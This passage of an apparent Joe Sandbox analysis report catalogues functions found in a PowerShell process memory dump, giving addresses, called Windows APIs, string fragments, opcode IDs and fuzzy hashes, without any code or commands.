                                                                                      • Opcode Fuzzy Hash: 0e9d24a3901733470457e1249cc7f7470b5df7d452cc394c81079ce9d69cb8f4
                                                                                      • Instruction Fuzzy Hash: 29F0A0FEE805528FDB04CF55EC5446533A3B7D930631D8479D501A3229DE74A902DA45
                                                                                      Function 00430B2B Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlanketProxy
                                                                                      • String ID:
                                                                                      • API String ID: 3890896728-0
                                                                                      • Opcode ID: 43d7ad87fa5e9b2b3dc0a0f51096ce11eba6c1c6eb289cd7ed6149dc19726bb4
                                                                                      • Instruction ID: 292623ad24ebdac7e3a1919eec7db90bd09e345a016beb7c95d50bd0d1ee1297
                                                                                      • Opcode Fuzzy Hash: 43d7ad87fa5e9b2b3dc0a0f51096ce11eba6c1c6eb289cd7ed6149dc19726bb4
                                                                                      • Instruction Fuzzy Hash: 83F0DAB4109701CFE344DF28D5A471ABBF0FB89704F10885CE4968B3A0CB75AA48CF82
                                                                                      Function 004328EB Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlanketProxy
                                                                                      • String ID:
                                                                                      • API String ID: 3890896728-0
                                                                                      • Opcode ID: 7e452866653096e15586fa2ca7bcaaf7b2c2c27ee5de88d8bf9c575216fae4cc
                                                                                      • Instruction ID: cf09600e75e0e16d5a8b454570da2a73a051c519e2c805bde7a2a4df5bee874d
                                                                                      • Opcode Fuzzy Hash: 7e452866653096e15586fa2ca7bcaaf7b2c2c27ee5de88d8bf9c575216fae4cc
                                                                                      • Instruction Fuzzy Hash: 7EF07AB45083418FD314DF24C5A871BBBE0FB85308F00891DE5998B390C7B59549CF82
                                                                                      Function 0043C570 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?,0043E0F9), ref: 0043C590
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 4ca71c55d9fe9b281f7981d367328e1df5632f63ab8c1559b6560bf0dd0d3b5a
                                                                                      • Instruction ID: b893ccae00c0100e086c015fd95e4a651a52546402759b79cf5975c20580b1f3
                                                                                      • Opcode Fuzzy Hash: 4ca71c55d9fe9b281f7981d367328e1df5632f63ab8c1559b6560bf0dd0d3b5a
                                                                                      • Instruction Fuzzy Hash: 28D01231815232FBC6102F28BC05BCB3B54DF5A321F0708A2F404AB075C764EC91DAD8

                                                                                      Non-executed Functions

                                                                                      Function 00433E30 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116clipboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                      • String ID: '$($*$-$5$6$8$;$=$I$L$q$}
                                                                                      • API String ID: 2832541153-2064290267
                                                                                      • Opcode ID: e5da5b9a56329a51e64cc872523e0dfe2627c190021f4751e0eab4ab2fc29bc9
                                                                                      • Instruction ID: e1340490ca777862a7890bfc042d0e04e3e37fcf4304b8f7f5516f793469ed24
                                                                                      • Opcode Fuzzy Hash: e5da5b9a56329a51e64cc872523e0dfe2627c190021f4751e0eab4ab2fc29bc9
                                                                                      • Instruction Fuzzy Hash: E0417FB150C3818ED301AF78958835EFEE0AB89319F04497EE4C987292D7BD8689C757
                                                                                      Function 00411D2B Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 479COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlExpandEnvironmentStrings.NTDLL ref: 00411EC3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentExpandStrings
                                                                                      • String ID: 8$?$L$[$^$a$p$y$|
                                                                                      • API String ID: 237503144-3949209405
                                                                                      • Opcode ID: 4a8879f59250b1b40dd97a34ff5c93777886415510556bea7e1a63f8662ddf82
                                                                                      • Instruction ID: f3e99263922766072051b57ffb7fb6feee41006b6636dbb619e47a4599fab130
                                                                                      • Opcode Fuzzy Hash: 4a8879f59250b1b40dd97a34ff5c93777886415510556bea7e1a63f8662ddf82
                                                                                      • Instruction Fuzzy Hash: 3512A17160C7808BC324DB38C5913EFBBE1AF85314F184A2EE9D9D7392D67898858B47
                                                                                      Function 004291AE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 004291DA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentExpandStrings
                                                                                      • String ID: +Ku$wpq
                                                                                      • API String ID: 237503144-1953850642
                                                                                      • Opcode ID: dd00e6cff4bb86df55339bea6a97020402cd2a79317d379f18720dc196f8341f
                                                                                      • Instruction ID: 7bb714cd0adbe8f34d65affdf2b55708b4274e5c8486b9e210027d19f02d6b7d
                                                                                      • Opcode Fuzzy Hash: dd00e6cff4bb86df55339bea6a97020402cd2a79317d379f18720dc196f8341f
                                                                                      • Instruction Fuzzy Hash: 6F51CE7220C3528FC324CF29984076FB7E2EBC5310F55892EE5D9CB285DB34D50A8B96
                                                                                      Function 004348C2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem
                                                                                      • String ID:
                                                                                      • API String ID: 4116985748-3916222277
                                                                                      • Opcode ID: e2dbdaae214771375078ea694cbe3190168a6d9690373aa5dbc97004a2b0131a
                                                                                      • Instruction ID: fc399c5893f09ab22ce38e0ca23dce90b2d9510c132352c7ff6b67ebebce5796
                                                                                      • Opcode Fuzzy Hash: e2dbdaae214771375078ea694cbe3190168a6d9690373aa5dbc97004a2b0131a
                                                                                      • Instruction Fuzzy Hash: 725160B4E142089FCB40EFACD98569DBBF0AB48710F11852EE898E7350D734A944CF96
                                                                                      Function 004290D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00429170
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentExpandStrings
                                                                                      • String ID: M/($M/(
                                                                                      • API String ID: 237503144-1710806632
                                                                                      • Opcode ID: ff58c78b0b27bbba40667f193cd225ec620092edf491b3be0aa44738014710da
                                                                                      • Instruction ID: a6fe4633539d009e024b46cdafe5f934a4e6010abeff1ae95be2d2e31fad33eb
                                                                                      • Opcode Fuzzy Hash: ff58c78b0b27bbba40667f193cd225ec620092edf491b3be0aa44738014710da
                                                                                      • Instruction Fuzzy Hash: 9E21017165C3615BE714CE34A88579BB7AAEBC2700F01892CA0D1AB2C5D679880B8756
                                                                                      Function 0043315D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitVariant
                                                                                      • String ID: A$B$B$D$K$M$j$q$w$y
                                                                                      • API String ID: 1927566239-3160828158
                                                                                      • Opcode ID: eddacfeeedbf2f75f6d5a413a3fd0e74a564a643395569db151e54d21141464b
                                                                                      • Instruction ID: 1c928e62d6be9c8abd40ab69893dd7e66488cb55e0e55af33186cf6b993705b4
                                                                                      • Opcode Fuzzy Hash: eddacfeeedbf2f75f6d5a413a3fd0e74a564a643395569db151e54d21141464b
                                                                                      • Instruction Fuzzy Hash: 6241287050CBC18AD335DB38845879EBFD16BD2214F188A9DE2E94B3E2D7788145CB57
                                                                                      Function 00432A42 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit
                                                                                      • String ID: C$C$P$T
                                                                                      • API String ID: 2610073882-3051599793
                                                                                      • Opcode ID: 70cc15cec2ffaa4e64ca4ef94809e37c86eda4dcb3d81504480f7fa9456d32e2
                                                                                      • Instruction ID: 97d45b2a61606388edab5b45fc9f71e82de55712b11621588c9e0c32b5ea6509
                                                                                      • Opcode Fuzzy Hash: 70cc15cec2ffaa4e64ca4ef94809e37c86eda4dcb3d81504480f7fa9456d32e2
                                                                                      • Instruction Fuzzy Hash: 0141E52000C7C18AD3728B38845979FBFE06B96324F488A9DD4ED8B3D2DB754149DB53
                                                                                      Function 004345DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem
                                                                                      • String ID:
                                                                                      • API String ID: 4116985748-3916222277
                                                                                      • Opcode ID: 21c571957f9eedbc13ecd4bfc36bc2f66f2a3654bfb69307476122a183b7950a
                                                                                      • Instruction ID: a44d6496935459a921f5505b3ec94aa74778db30aba9446cb93c37adee0bb457
                                                                                      • Opcode Fuzzy Hash: 21c571957f9eedbc13ecd4bfc36bc2f66f2a3654bfb69307476122a183b7950a
                                                                                      • Instruction Fuzzy Hash: D0317DF49143149FDB00EFA8D98561EBBF4BB89704F11852EE898DB364D374A948CF86